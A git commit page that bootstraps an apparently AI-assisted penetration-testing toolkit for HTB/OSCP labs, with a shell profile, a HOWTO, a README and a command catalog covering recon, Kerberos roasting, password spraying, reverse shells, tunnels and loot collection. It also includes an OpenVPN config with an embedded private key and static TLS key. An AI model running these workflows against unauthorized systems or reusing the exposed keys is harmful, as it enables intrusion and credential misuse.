feat: bootstrap PentestPilot toolkit, docs, and orchestrators

Initial commit of PentestPilot — AI‑assisted pentest recon and orchestration toolkit.\n\nHighlights:\n- Resumeable pipelines (full_pipeline) with manifest state and elapsed timings\n- Rich dashboard (colors, severity bars, durations, compact/json modes)\n- Web helpers: httpx→nuclei auto, tech routing + quick scanners\n- Agents: multi‑task orchestrator (web/full/ad/notes/post) with resume\n- AD/SMB, password utils, shells, transfer, privesc, tunnels\n- QoL scripts: proxy toggle, cleanup, tmux init, URL extractor\n- Docs: README (Quick Start + Docs Index), HOWTO (deep guide), TOOLKIT (catalog with examples)\n\nStructure:\n- bin/automation: pipelines, dashboard, manifest, resume, tech_actions\n- bin/web: routing, scanners, helpers\n- bin/ai: orchestrators + robust AI utils\n- bin/ad, bin/passwords, bin/shells, bin/transfer, bin/privesc, bin/misc, bin/dns, bin/scan, bin/windows, bin/hashes\n- HOWTO.md and TOOLKIT.md cross‑linked with examples\n\nUse:\n- settarget <target>; agent full <domain|hosts.txt>; dashboard --compact\n- See HOWTO.md for setup, semantics, and examples.
This commit is contained in:
PentestPilot Bot
2025-10-08 16:00:22 +02:00
commit 461c14d676
119 changed files with 4449 additions and 0 deletions

BIN
.DS_Store vendored Normal file

Binary file not shown.

108
.zshrc.htb Normal file
View File

@@ -0,0 +1,108 @@
# HTB/OSCP helpers — source this from your ~/.zshrc
# Prompt (concise)
autoload -Uz colors && colors
PROMPT='%{$fg[green]%}%n%{$reset_color%}@%{$fg[cyan]%}%m%{$reset_color%}:%{$fg[yellow]%}%1~%{$reset_color%} %# '
# Options
setopt autocd correct no_flow_control hist_ignore_all_dups share_history
HISTSIZE=10000
SAVEHIST=10000
# Paths
export HTB_ROOT=${HTB_ROOT:-$PWD}
export PATH="$HTB_ROOT/bin:$HTB_ROOT/bin/enum:$HTB_ROOT/bin/web:$HTB_ROOT/bin/shells:$HTB_ROOT/bin/transfer:$HTB_ROOT/bin/crypto:$HTB_ROOT/bin/misc:$HTB_ROOT/bin/privesc:$HTB_ROOT/bin/automation:$HTB_ROOT/bin/ai:$HTB_ROOT/bin/ad:$HTB_ROOT/bin/passwords:$HTB_ROOT/bin/windows:$HTB_ROOT/bin/dns:$HTB_ROOT/bin/scan:$HTB_ROOT/bin/tunnel:$HTB_ROOT/bin/pwn:$HTB_ROOT/bin/hashes:$PATH"
# Aliases
alias ll='ls -lah'
alias ..='cd ..'
alias gg='rg -n --hidden --smart-case'
alias pserve='python3 -m http.server 8000'
alias l='ls -la'
# Target workflow
settarget() {
if [[ -z "$1" ]]; then echo "Usage: settarget <ip_or_host>" >&2; return 1; fi
export TARGET="$1"
mkdir -p "$HTB_ROOT/targets/$TARGET"/{scans,loot,www,exploits}
cd "$HTB_ROOT/targets/$TARGET" || return
export OUTDIR="$PWD/scans"
echo "[+] TARGET=$TARGET"
echo "[+] OUTDIR=$OUTDIR"
}
# Quick wrappers (require TARGET to be set)
alias nq='nmap_quick.sh "$TARGET"'
alias nf='nmap_full.sh "$TARGET"'
alias nu='nmap_udp.sh "$TARGET"'
alias snmp='snmp_enum.sh "$TARGET"'
alias smb='smb_enum.sh "$TARGET"'
alias ar='auto_recon.sh "$TARGET"'
# Quick web helpers
alias headers='http_headers.sh'
alias methods='methods.sh'
alias webrecon='web_recon.sh "$TARGET"'
alias wideweb='wide_web_recon.sh'
alias notesinit='notes_init.sh "$TARGET"'
alias notesattach='notes_attach.sh "$TARGET"'
# AI helpers
alias aiplan='commands_planner.py'
alias aireview='review_findings.py'
alias aiweb='orchestrate_web.py'
alias agent='agent_orchestrator.py'
alias fullpipe='full_pipeline.sh'
alias dashboard='dashboard.py'
alias resumeall='resume_all.py'
alias techactions='tech_actions.py'
alias proxyon='proxy_toggle.sh on'
alias proxyoff='proxy_toggle.sh off'
alias cleanupscans='cleanup_scans.sh'
# SMB helpers
alias e4l='enum4linux_ng.sh "$TARGET"'
alias smbmapq='smbmap_quick.sh "$TARGET"'
# DNS helpers
alias subenum='subenum.sh'
# IP helpers
ipmy() {
ip -br a 2>/dev/null | awk '$2=="UP"{print $1,$3}' || ifconfig 2>/dev/null
}
# Extract various archives: x <file>
x() {
if [[ -f "$1" ]]; then
case "$1" in
*.tar.bz2) tar xjf "$1" ;;
*.tar.gz) tar xzf "$1" ;;
*.bz2) bunzip2 "$1" ;;
*.rar) unrar x "$1" ;;
*.gz) gunzip "$1" ;;
*.tar) tar xf "$1" ;;
*.tbz2) tar xjf "$1" ;;
*.tgz) tar xzf "$1" ;;
*.zip) unzip "$1" ;;
*.7z) 7z x "$1" ;;
*) echo "don't know how to extract '$1'" ;;
esac
else
echo "'$1' is not a valid file"
fi
}
# Quick notes helper (creates notes.md in target dir)
notes() {
[[ -z "${TARGET:-}" ]] && { echo "set TARGET first (settarget <ip>)" >&2; return 1; }
: > notes.md 2>/dev/null || true
${EDITOR:-vim} notes.md
}
# Convenience for proxying
export HTTP_PROXY=${HTTP_PROXY:-}
export HTTPS_PROXY=${HTTPS_PROXY:-}
# Done
echo "[+] Loaded .zshrc.htb (HTB_ROOT=$HTB_ROOT)"

279
HOWTO.md Normal file
View File

@@ -0,0 +1,279 @@
PentestPilot — HOWTO
Table of Contents
- Overview — #overview
- Install & Setup — #install--setup
- Core Env Vars — #core-env-vars
- Target Workflow — #target-workflow
- Automation & Orchestration — #automation--orchestration
- Dashboard (Status & Evidence) — #dashboard-status--evidence
- Manifest (State & Resume) — #manifest-state--resume
- AI Integrations — #ai-integrations
- Web Recon & Routing — #web-recon--routing
- Active Directory & SMB — #active-directory--smb
- Passwords & Wordlists — #passwords--wordlists
- Shells, Transfers, Privesc — #shells-transfers-privesc
- Tunnels & Port Forwards — #tunnels--port-forwards
- QoL Utilities — #qol-utilities
- PostExploitation & Reporting — #post-exploitation--reporting
- Safety Notes — #safety-notes
- EndtoEnd Example — #end-to-end-example
- Troubleshooting — #troubleshooting
- Customization — #customization
- Appendix — Common Command Recipes — #appendix--common-command-recipes
Overview
- This toolkit streamlines OSCP/HTB workflows: discovery, web recon, AD, credential hygiene, shells, tunnels, transfers, privilege escalation, postexploitation, reporting, and AIassisted orchestration.
- Everything is CLIfirst, idempotent when possible, and resumeaware via a pertarget manifest.
- See: README.md:1 for the quick summary and TOOLKIT.md:1 for the command catalog.
- Tips and conventions below assume a Linux attacker VM (Kali/Parrot/Ubuntu). Adjust paths for your OS.
Install & Setup
1) Place the repo in your working directory (e.g., `~/hax/htb`).
2) Load the shell profile so aliases and PATH work:
echo "source $(pwd)/.zshrc.htb" >> ~/.zshrc
exec zsh
3) Optional AI setup:
- OpenAI: export OPENAI_API_KEY=sk-... (and optionally OPENAI_MODEL)
- Ollama: install+run, optionally export OLLAMA_MODEL=llama3.1 (default) and OLLAMA_HOST
Recommended Tools
- Install commonly used tools upfront (Debian/Ubuntu examples):
sudo apt update && sudo apt install -y nmap curl jq ripgrep python3 python3-pip tmux
sudo apt install -y gobuster seclists ffuf sqlmap
sudo apt install -y smbclient ldap-utils snmp snmp-mibs-downloader
pipx install httpx-toolkit nuclei gowitness || true
pipx runpip nuclei install -U nuclei || true
pipx install "impacket" || true
gem install wpscan || true
pipx install droopescan || true
apt install joomscan || true
snap install magescan || true
# optional: chisel, socat, naabu, masscan, subfinder/amass, crackmapexec
Notes:
- Some tools (httpx/nuclei) are provided by multiple packages; ensure they are in PATH.
- If a wrapper says a tool is missing, either install or skip that specific step.
- Use `pipx` (or venv) for Pythonbased tools to avoid sitepackages collisions.
Core Env Vars
- `HTB_ROOT` (default: current repo path) — base for targets and scripts.
- `TARGET` — a current target convenience var set by `settarget`.
- `OUTDIR` — output directory for scans in the current target (set by `settarget`).
- Proxies: `HTTP_PROXY`/`HTTPS_PROXY` can be toggled via `proxy_toggle.sh on|off`.
Target Workflow
1) Create a target workspace:
settarget 10.10.10.10
This creates `targets/<target>/{scans,loot,www,exploits}` and sets `OUTDIR`.
2) Notes:
- `notesinit` scaffolds `notes.md` in the target directory.
- `notesattach` appends a scan artifacts summary to notes.
3) Directories:
- `targets/<target>/scans` — scanner logs, json, summaries
- `targets/<target>/loot` — collected artifacts
- `targets/<target>/notes.md` — your engagement notes
- `targets/<target>/manifest.json` — pertarget state (see Manifest below)
4) Common recipes (see Appendix for more):
- Quick nmap: nq → review `scans/*_quick_*.nmap`
- Full TCP then service: nf → review `phase1`/`phase2` outputs
- UDP quick check: nu → review common UDP services
- Web checks: headers/methods/tech → dirbuster/param_fuzz → sqli_quick
- SMB/LDAP: smb_enum.sh / ldap_enum.sh — save listings in `scans/`
Quick Aliases
- Nmap: `nq` (quick), `nf` (full TCP), `nu` (UDP top)
- Web: `webrecon` (current TARGET), `wideweb <hosts.txt>` (lists)
- Full pipeline: `fullpipe <domain|hosts.txt>` (DNS→httpx→nuclei→tech route, resumeaware)
- AI agents: `agent` (multitask), `aiweb`, `aiplan`, `aireview`
- Dashboard: `dashboard` (status), `resumeall`, `techactions`
- QoL: `proxyon`, `proxyoff`, `cleanupscans`, `tmux_init.sh`
Automation & Orchestration
- Minimal recon: `auto_recon.sh <target>`
- Web recon (current TARGET): `web_recon.sh <target|--url URL>` → headers/tech/backup/dirb (+screenshots if `gowitness`)
- Wide recon (list of hosts): `wide_web_recon.sh <hosts.txt>` → httpx + nuclei + screenshots
- Oneclick pipeline: `full_pipeline.sh <domain|hosts.txt> [--resume|--force]`
- DNS subenum (if domain) → httpx (balanced) → nuclei (auto severity) → tech route → optional WPScan
- Resume (default) consults `manifest.json` and skips completed steps.
- Writes evidence JSON + summaries (httpx/nuclei) into OUTDIR and manifest.
- Agents (AIaware): `bin/ai/agent_orchestrator.py:1`
- `agent full <domain|hosts.txt>` — small state machine for the full pipeline; retries resume passes, then runs `tech_actions.py --run`.
- `agent web <hosts.txt> [--force]` — httpx → nuclei → screenshots → AI plan (resumeaware subtasks)
- `agent ad <host> [--force]` — enum4linux/smbmap/rpc (resumeaware)
- `agent notes <target> [--force]` — notes init + attach (resumeaware)
- `agent post <target> [--force]` — linux_loot + report pack (resumeaware)
- Resume all targets: `resume_all.py` — loops over targets/* and resumes incomplete `full_pipeline` runs.
Advanced: Pipeline Semantics
- `--resume` (default) skips steps whose manifest task status is `ok`.
- `--force` reruns steps and overwrites evidence (new timestamps/files).
- Each phase records elapsed seconds and evidence file paths in manifest meta.
- If a run fails midway, you can reinvoke with `--resume` to continue where you left off.
Dashboard (Status & Evidence)
- Command: `dashboard` Options: `--no-color`, `--compact`, `--json`
- Columns:
- target, created, last (timestamp of last pipeline), urls (count)
- dns, httpx, nuclei, tech, wp — perphase status with elapsed seconds
- sev — severity counts (e.g., c:1 h:3 m:2)
- toptechs — top techs from httpx tech summary (e.g., wordpress:3, drupal:1)
- bar — colorized severity proportion bar (critical/high/medium/low)
- Evidence sources (autopersisted by pipeline):
- httpx JSON: `OUTDIR/httpx_<ts>.json` and `httpx_<ts>.summary.json`
- nuclei JSON: `OUTDIR/httpx2nuclei_<ts>/nuclei.json` and `summary.json`
Manifest (State & Resume)
- Path: `targets/<target>/manifest.json`
- Schema (highlevel):
{
"target": "<name>",
"created_at": "YYYY-MM-DD HH:MM:SS",
"last_pipeline": "<ts>",
"urls": [ ... ],
"tasks": {
"dns": {"status":"ok|running|fail","started_at":"...","finished_at":"...","meta":{"subs_file":"...","elapsed_sec":N}},
"httpx": {"meta":{"urls_file":"...","httpx_json":"...","httpx_summary":"...","elapsed_sec":N}},
"nuclei": {"meta":{"log":"...","nuclei_json":"...","nuclei_summary":"...","elapsed_sec":N}},
"techroute": {"meta":{"log":"...","elapsed_sec":N}},
"wpscan": {"meta":{"log":"...","elapsed_sec":N}},
"web_httpx|web_nuclei|web_shots|web_plan": {"meta":{"elapsed_sec":N}},
"ad_*", "notes_*", "post_*": {"meta":{"elapsed_sec":N}}
}
}
- CLI: `bin/automation/manifest.py:1`
- `init <target>` — create manifest
- `set|get <target> <key> [value]` — set or read toplevel values
- `addlist <target> <key> <file|a,b,c>` — append to a list
- `show <target>` — print JSON
- `task <target> <name> start|ok|fail [meta-json]` — update tasks (status, timestamps, meta)
- `taskstatus <target> <name>` — prints status; exit 0 if ok, 2 if running, 1 otherwise
- `taskreset <target> <name>` — remove/reset a task entry
AI Integrations
- Providers: OpenAI (OPENAI_API_KEY) or local Ollama (defaults chosen automatically).
- Robust helpers: `bin/ai/_ai_utils.py:1` (retries, timeouts, prompt truncation)
- Tools:
- `ask.py` — quick prompts
- `commands_planner.py` — converts a goal/context into readytorun toolkit commands
- `orchestrate_web.py` — probes (httpx) and asks AI for a recon plan
- `review_findings.py` — summarizes notes into risks + next steps
- `agent_orchestrator.py` — orchestrates web/full/ad/notes/post tasks and updates manifest
Troubleshooting AI:
- If calls fail, `_ai_utils.py` retries with exponential backoff.
- If no OPENAI_API_KEY is set, the system falls back to Ollama (ensure its running).
- You can reduce output size by setting smaller prompts and using `--compact` when calling dashboard.
Web Recon & Routing
- Pipeline: `httpx_to_nuclei.sh` → httpx alive list → nuclei with auto severity (based on URL count) → produces `.txt`, `.json`, `summary.json`.
- Tech routing: `httpx_tech_route.py` flags:
- `--tech` filter; `--severity` list; `--wpscan [--wpscan-limit N]`; `--extra [--extra-limit N]`; `--dry-run`
- Presets: wordpress, drupal, joomla, laravel, aspnet, spring, tomcat, iis, exchange, sharepoint, grafana, kibana, gitlab, confluence, jupyter, jenkins, magento, sonarqube, jira, confluence
- With `--extra`, autoruns quick wrappers when present (e.g., WPScan, Droopescan, Joomscan, Jenkins/SonarQube/Magento/Jira/Confluence quick checks)
- Extras:
- `httpx_presets.sh`: concurrency profiles; `httpx_probe.sh` for fast probes
- `gobuster_dir.sh`, `gobuster_vhost.sh`; `dirbuster.sh` (ffuf); backup hunters, CORS/methods/TLS, LFI tester
Active Directory & SMB
- Impacket wrappers: `getnpusers_wrapper.sh`, `getspns_wrapper.sh`
- `kerbrute_wrapper.sh` (user enum), `cme_quick.sh` (shares/sessions/loggedon), `rpc_quick.sh`
- SMB `smbmap_quick.sh` and `smb_check_write.sh`
Passwords & Wordlists
- `mutate_words.py`, `merge_dedupe.sh`, `wordlist_cleanup.sh` — build/clean wordlists
- `spray_http_basic.sh` — cautious HTTP Basic Auth spray (respect lockout policies)
Shells, Transfers, Privesc
- Shells: reverse oneliners (`revsh.py`), listener (`listener.sh`), TTY upgrade tips
- Transfers: `http_serve.sh` or `serve.py` (with web upload), `smb_server.sh`, `dl_oneshots.sh`, `push_http.sh`
- Linux privesc: `linux_quick_enum.sh`, `suid_scan.sh`, `caps_scan.sh`
- Windows privesc: `privesc_quick.ps1`, `find_unquoted_services.ps1`, `find_path_writable.ps1`, `win_share_enum.ps1`
Tunnels & Port Forwards
- `chisel_server.sh` / `chisel_client.sh` — reverse tunnels
- `autossh_socks.sh` — resilient SOCKS proxy
- `socat_forward.sh` and `port_forward.sh` — local/remote forwards
QoL Utilities
- `cleanup_scans.sh` — prune old scan files
- `proxy_toggle.sh` — set/unset HTTP(S) proxy env vars
- `tmux_init.sh` — quick tmux workspace
- `extract_urls.py` — harvest URLs from files (logs/notes)
PostExploitation & Reporting
- `linux_loot.sh` — safe, sizecapped artifacts collector (config via env: `MAX_SIZE`, `INCLUDE_*`)
- `windows_loot.ps1` — conservative Windows loot collector (zip fallback)
- `pack_report.sh` — compiles a markdown with summaries and file listings
Safety Notes
- Use only with explicit authorization.
- Many steps are safe by default (no brute force). Be mindful of account lockout policies when using authrelated tooling.
- For “unsafe” or exploitheavy checks, consider separate gated wrappers and explicit flags.
EndtoEnd Example
1) Set up target and notes:
settarget target.htb
notesinit
2) Run full autonomous recon (resumeaware):
agent full target.htb
3) Review dashboard:
dashboard --compact
4) Let AI suggest next steps from tech:
techactions $TARGET
5) Postexploitation:
agent post $TARGET
6) Resume across multiple targets later:
resumeall
Troubleshooting
- Tool missing: wrappers fail gracefully and log hints. Install optional tools (httpx, nuclei, gobuster, gowitness, wpscan, droopescan, joomscan, magescan, impacket).
- Manifest stuck in running: `manifest.py taskreset <target> <name>`.
- No colors in dashboard: add `--no-color` or your terminal might not support ANSI.
Customization
- Adjust tags/severity in `httpx_to_nuclei.sh:1` and `httpx_tech_route.py:1`.
- Extend tech presets and quick wrappers in `bin/web/`.
- Tweak agent behaviors in `bin/ai/agent_orchestrator.py:1`.
- Add your own manifest keys via `manifest.py set <target> key value` for custom dashboards.
Appendix — Common Command Recipes
- Directory brute (gobuster): gobuster_dir.sh http://$TARGET/ /usr/share/wordlists/dirb/common.txt php,txt 50
- Vhost brute: gobuster_vhost.sh http://$TARGET/ subdomains-top1million-5000.txt 100
- Probe techs: httpx_probe.sh hosts.txt > live.txt
- Route by tech (with extras): httpx_tech_route.py live.txt --tech wordpress,drupal --extra --wpscan
- Nuclei quick: nuclei_quick.sh live.txt cves,exposures
- SMB write check: smb_check_write.sh $TARGET sharename
- LDAP quick users: ldap_quick_users.sh $TARGET 'DC=target,DC=htb'
- Secrets scan: scan_secrets.sh .
Legend:
- DNS/httpx/nuclei/tech/wp: status + elapsed time `(OK(12s))`.
- sev: short counts (`c:2 h:3 m:5`), bar: █ blocks colored per severity.
- --compact removes dates and shows essentials when terminal space is tight.
- --json lets you script your own dashboards.
Example manifest snippet:
{
"target": "target.htb",
"tasks": {
"httpx": {
"status": "ok",
"started_at": "2025-10-08 10:21:00",
"finished_at": "2025-10-08 10:21:08",
"meta": {
"urls": 34,
"urls_file": "targets/target.htb/scans/urls_20251008_1021.txt",
"httpx_json": ".../httpx_20251008_1021.json",
"httpx_summary": ".../httpx_20251008_1021.summary.json",
"elapsed_sec": 8
}
}
}
}
Customizing Tech Routes:
- Edit `httpx_tech_route.py` to add or adjust presets in the `presets` map.
- To autolaunch additional quick wrappers, update the `--extra` handler.
Auto Severity Tuning (nuclei):
- `httpx_to_nuclei.sh` sets nuclei severity via `--severity auto` mapping:
- >500 URLs → `high,critical`; >100 → `medium,high,critical`; else `low,medium,high,critical`.
- Override with explicit `--severity` or adjust logic in the script.

87
HTB.ovpn Normal file
View File

@@ -0,0 +1,87 @@
client
dev tun
proto tcp
remote edge-eu-free-2.hackthebox.eu 443
resolv-retry infinite
nobind
persist-key
persist-tun
remote-cert-tls server
comp-lzo
verb 3
data-ciphers-fallback AES-128-CBC
data-ciphers AES-256-CBC:AES-256-CFB:AES-256-CFB1:AES-256-CFB8:AES-256-OFB:AES-256-GCM
tls-cipher "DEFAULT:@SECLEVEL=0"
auth SHA256
key-direction 1
<ca>
-----BEGIN CERTIFICATE-----
MIICDjCCAcCgAwIBAgIQAY7iX+I6dfaVWaMJXidIRTAFBgMrZXAwZDELMAkGA1UE
BhMCR1IxFTATBgNVBAoTDEhhY2sgVGhlIEJveDEQMA4GA1UECxMHU3lzdGVtczEs
MCoGA1UEAxMjSFRCIFZQTjogUm9vdCBDZXJ0aWZpY2F0ZSBBdXRob3JpdHkwHhcN
MjQwNDE1MTUyODM4WhcNMzQwNDE1MTUyODM4WjBeMQswCQYDVQQGEwJHUjEVMBMG
A1UEChMMSGFjayBUaGUgQm94MRAwDgYDVQQLEwdTeXN0ZW1zMSYwJAYDVQQDEx1I
VEIgVlBOOiBldS1mcmVlLTIgSXNzdWluZyBDQTAqMAUGAytlcAMhANRtLwPdgQ/j
oGEo7GTBqm6rNN83vgRsVqMf9cP83KlMo4GNMIGKMA4GA1UdDwEB/wQEAwIBhjAn
BgNVHSUEIDAeBggrBgEFBQcDAgYIKwYBBQUHAwEGCCsGAQUFBwMJMA8GA1UdEwEB
/wQFMAMBAf8wHQYDVR0OBBYEFD2YUNtsvUD2ynIAtfr1Uk1NjYz8MB8GA1UdIwQY
MBaAFNQHZnqD3OEfYZ6HWsjFzb9UPuDRMAUGAytlcANBAKYH1gYc72heLF8mu2vo
8FAcozEtFv+2g1OFvahcSoPrn7kbUcq8ebGb+o6wbgrVm8P/Y/c3h5bmnw5y8V3t
9gw=
-----END CERTIFICATE-----
-----BEGIN CERTIFICATE-----
MIIB8zCCAaWgAwIBAgIQAY7Mx8YFd9iyZFCrz3LiKDAFBgMrZXAwZDELMAkGA1UE
BhMCR1IxFTATBgNVBAoTDEhhY2sgVGhlIEJveDEQMA4GA1UECxMHU3lzdGVtczEs
MCoGA1UEAxMjSFRCIFZQTjogUm9vdCBDZXJ0aWZpY2F0ZSBBdXRob3JpdHkwIBcN
MjQwNDExMTA1MDI4WhgPMjA1NDA0MTExMDUwMjhaMGQxCzAJBgNVBAYTAkdSMRUw
EwYDVQQKEwxIYWNrIFRoZSBCb3gxEDAOBgNVBAsTB1N5c3RlbXMxLDAqBgNVBAMT
I0hUQiBWUE46IFJvb3QgQ2VydGlmaWNhdGUgQXV0aG9yaXR5MCowBQYDK2VwAyEA
FLTHpDxXnmG/Xr8aBevajroVu8dkckNnHeadSRza9CCjazBpMA4GA1UdDwEB/wQE
AwIBhjAnBgNVHSUEIDAeBggrBgEFBQcDAgYIKwYBBQUHAwEGCCsGAQUFBwMJMA8G
A1UdEwEB/wQFMAMBAf8wHQYDVR0OBBYEFNQHZnqD3OEfYZ6HWsjFzb9UPuDRMAUG
AytlcANBABl68VB0oo0rSGZWt6L+LNMnyHEJl+CQ+FTjQfzE6oqEMAvJTzdjMyeG
OOUNlQYwGRVajOauFa/IMvDsTBXOgw8=
-----END CERTIFICATE-----
</ca>
<cert>
-----BEGIN CERTIFICATE-----
MIIBxjCCAXigAwIBAgIQAZQTnGxLc3eYzWO9SnM9sjAFBgMrZXAwXjELMAkGA1UE
BhMCR1IxFTATBgNVBAoTDEhhY2sgVGhlIEJveDEQMA4GA1UECxMHU3lzdGVtczEm
MCQGA1UEAxMdSFRCIFZQTjogZXUtZnJlZS0yIElzc3VpbmcgQ0EwHhcNMjQxMjI5
MTgxMDA2WhcNMzQxMjI5MTgxMDA2WjBKMQswCQYDVQQGEwJHUjEVMBMGA1UEChMM
SGFjayBUaGUgQm94MRAwDgYDVQQLEwdTeXN0ZW1zMRIwEAYDVQQDEwltcC0yNzQ1
NjQwKjAFBgMrZXADIQDiwraGYtEpx63P6AMDQgczmsx4WO9iVPGTkVRRkyHrmqNg
MF4wDgYDVR0PAQH/BAQDAgeAMB0GA1UdJQQWMBQGCCsGAQUFBwMCBggrBgEFBQcD
ATAMBgNVHRMBAf8EAjAAMB8GA1UdIwQYMBaAFD2YUNtsvUD2ynIAtfr1Uk1NjYz8
MAUGAytlcANBANAkGgddoR9WIbfv3C8gIPx6ivEyq1Tlo354JG/y+lv015bOjrmy
aL7cF4ILRaPTbxWeBfVeVQOwLrz4rCBwsg0=
-----END CERTIFICATE-----
</cert>
<key>
-----BEGIN PRIVATE KEY-----
MC4CAQAwBQYDK2VwBCIEIAA2VTVH7CjQQECTQGg/FAy+5uJ6fGSRN5vAbeK3qawi
-----END PRIVATE KEY-----
</key>
<tls-crypt>
#
# 2048 bit OpenVPN static key
#
-----BEGIN OpenVPN Static key V1-----
85341e27fb3510f97f3455db449ea6c4
bf6b87e90802ced4c36feaa162ddd218
9df22b9895d5770fd942b745b8d5532b
716fa58ac45e0f59b589ae1bc7ad11c7
633c0c811b2ff682a35da172f6b32452
410c971b8d422502aa012a37422d63bc
8ce669f3f1ded38144e3df1d0b689ae3
5fa92a5f23600fba10da3ce71163e128
bbac0bc5a922c16f3803f9dc36be960a
6cb371df43583fef525aa529ef2615b9
95d7acd479cf90eada71684bec3c70e3
2f2d25a66732544c5bc5f225d01940b7
b66cf57327a3331ec7550e915bdc68a9
4949a88a101f2d3383268fd32ffece1d
7d8d62d679707ae0c4d36a582b4a2a8f
24ee9da8eefa18339cd8d6425dceef89
-----END OpenVPN Static key V1-----
</tls-crypt>

82
README.md Normal file
View File

@@ -0,0 +1,82 @@
PentestPilot
- Overview
- Scriptdriven toolkit to accelerate common OSCP/HTB workflows: discovery, web recon, AD, password hygiene, shells, tunnels, transfers, privilege escalation, postexploitation, reporting.
- AI agents and orchestrators automate reconnaissance and organize results. Works with OpenAI (OPENAI_API_KEY) or local Ollama.
- New? Start with HOWTO.md:1 for stepbystep usage, dashboard details, and resumeable pipelines.
Quick Start (Dashboard in ~35 minutes)
- Clone/open the repo and load the shell profile:
echo "source $(pwd)/.zshrc.htb" >> ~/.zshrc && exec zsh
- Minimal deps (Debian/Ubuntu):
sudo apt update && sudo apt install -y nmap curl jq ripgrep python3 tmux
pipx install httpx-toolkit nuclei gowitness || true
- Create a target workspace: settarget target.htb
- Kick off oneclick recon (resumeaware): agent full target.htb
- Watch progress: dashboard --compact (add --no-color if needed)
- Resume many later: resumeall (resumes incomplete pipelines for all targets)
See HOWTO.md:1 for details, alternatives, and troubleshooting.
AI Setup
- OpenAI: export OPENAI_API_KEY=sk...
- Ollama: install and run ollama; optionally export OLLAMA_MODEL=llama3.1
- Test: ask.py "You online?"
Key Commands (aliases)
- nq | nf | nu → nmap quick/full/udp
- webrecon → focused web recon on detected web ports
- wideweb <hosts.txt> → httpx + screenshots + nuclei
- fullpipe <domain|hosts.txt> → chain DNS→httpx→nuclei→tech route (+WPScan)
- notesinit / notesattach → notes scaffolding
- agent <task> → multiagent runner (web|full|notes|post|ad)
AI Orchestration
- bin/ai/agent_orchestrator.py
- agent web hosts.txt → httpx→nuclei→screenshots→AI plan (resume-aware; use --force to rerun)
- agent full domain.tld → run full pipeline
- agent notes $TARGET → init + attach notes
- agent post $TARGET → linux_loot + report pack (resume-aware)
- agent ad $TARGET → enum4linuxng + smbmap + rpcclient
- Robust completion utils: bin/ai/_ai_utils.py (retries, provider fallback)
- Planning/Review tools: commands_planner.py, orchestrate_web.py, review_findings.py
State & Resume
- Target manifest at targets/<target>/manifest.json
- Manage via bin/automation/manifest.py
- init, set, get, addlist, show, task <name> start|ok|fail [meta], taskstatus, taskreset
- Pipelines update tasks with timestamps and metadata (dns, httpx, nuclei, techroute, wpscan, full_pipeline). Agents add web_* (httpx/nuclei/screenshots/plan), notes_* and post_* tasks, and ad_* tasks.
Features at a Glance
- Resumeable pipelines (agent full, resumeall) and color dashboard with severity bars + perphase durations
- Evidencefirst storage (httpx/nuclei JSON + summaries) to drive next actions
- Techaware routing (WP/Drupal/Joomla/Jenkins/SonarQube/Magento/Jira/Confluence)
- AI helpers for planning and findings review (OpenAI or Ollama)
- QoL utilities: proxies, cleanup, tmux bootstrap, URL extraction
Dependencies
- Recommended: nmap, ffuf, httpx, nuclei, gobuster, gowitness, subfinder|amass, sqlmap, wpscan, droopescan, joomscan, magescan, impacket, ldap-utils, snmp, ripgrep, jq, python3 requests, socat, chisel
Documentation
- HOWTO.md:1 — indepth “how to” with recommended tools, pipeline semantics, dashboard legend, manifest schema, and examples.
- TOOLKIT.md:1 — command catalog grouped by category with references back to HOWTO.
Docs Index (quick links)
- HOWTO: Overview — HOWTO.md#overview
- Install & Setup — HOWTO.md#install--setup
- Core Env Vars — HOWTO.md#core-env-vars
- Target Workflow — HOWTO.md#target-workflow
- Automation & Orchestration — HOWTO.md#automation--orchestration
- Dashboard (Status & Evidence) — HOWTO.md#dashboard-status--evidence
- Manifest (State & Resume) — HOWTO.md#manifest-state--resume
- AI Integrations — HOWTO.md#ai-integrations
- Web Recon & Routing — HOWTO.md#web-recon--routing
- Active Directory & SMB — HOWTO.md#active-directory--smb
- Passwords & Wordlists — HOWTO.md#passwords--wordlists
- Shells, Transfers, Privesc — HOWTO.md#shells-transfers-privesc
- Tunnels & Port Forwards — HOWTO.md#tunnels--port-forwards
- QoL Utilities — HOWTO.md#qol-utilities
- PostExploitation & Reporting — HOWTO.md#post-exploitation--reporting
- Troubleshooting — HOWTO.md#troubleshooting
Safety
- Intended for systems you have explicit permission to test. Scripts default to safe, passive checks unless you optin to aggressive actions.

356
TOOLKIT.md Normal file
View File

@@ -0,0 +1,356 @@
PentestPilot — Quick Reference
For stepbystep usage, pipeline semantics, dashboard features, and resume behavior, read HOWTO.md:1. This file focuses on a clickable, categorized command index with succinct usage. Most entries accept TARGET via env if a positional argument is omitted.
Table of Contents
- Setup — #setup
- Core Workflow — #core-workflow
- Enumeration — #enumeration-requires-target
- Automation — #automation-binautomation--see-howto-automation--orchestration-dashboard-manifest
- Web helpers — #web-helpers-binweb--see-howto-web-recon--routing
- Reverse shells — #reverse-shells-binshells
- File transfer — #file-transfer-bintransfer
- Crypto / Text — #crypto--text-bincrypto
- Privilege Escalation — #privilege-escalation-binprivesc
- Misc — #misc-binmisc
- AI — #ai-binai--see-howto-ai-integrations
- Active Directory — #active-directory-binad
- Passwords — #passwords-binpasswords
- Windows — #windows-binwindows
- PostExploitation — #post-exploitation-binpost
- DNS — #dns-bindns
- Scanning — #scanning-binscan
- Tunnels — #tunnels-bintunnel
- Pwn — #pwn-binpwn
- Hashes — #hashes-binhashes
- Tips — #tips
Setup
- Keep this repo in a working folder, e.g., htb/.
- Source the shell helpers from your main zshrc:
echo "source $(pwd)/.zshrc.htb" >> ~/.zshrc
- Open a new shell or run: source .zshrc.htb
Core Workflow
- settarget <ip_or_host>
- Creates targets/<target> with scans, loot, www, exploits.
- Sets OUTDIR to the targets scans directory.
- ar → auto_recon: quick scan, optional UDP, basic web enum
- webrecon → run web_recon on detected web ports
- wideweb → wide_web_recon on a list
- notesinit → scaffold notes.md in target directory
- notesattach → append scan artifacts summary to notes
Enumeration (requires TARGET)
- nq → Quick nmap: scripts + versions
- nf → Full TCP: -p- then service/version
- nu → UDP top 200
- smb → SMB enumeration (anon by default)
- snmp → SNMP enumeration (community defaults to public)
Individual scripts (bin/)
- nmap_quick.sh <target>
- nmap_full.sh <target> [--rate 5000]
- nmap_udp.sh <target> [--top 200]
- smb_enum.sh <ip> [user] [pass]
- ldap_enum.sh <ip> [user] [pass] — auto-detect baseDNs
- nfs_enum.sh <ip>
- ftp_enum.sh <ip>
- snmp_enum.sh <ip> [community]
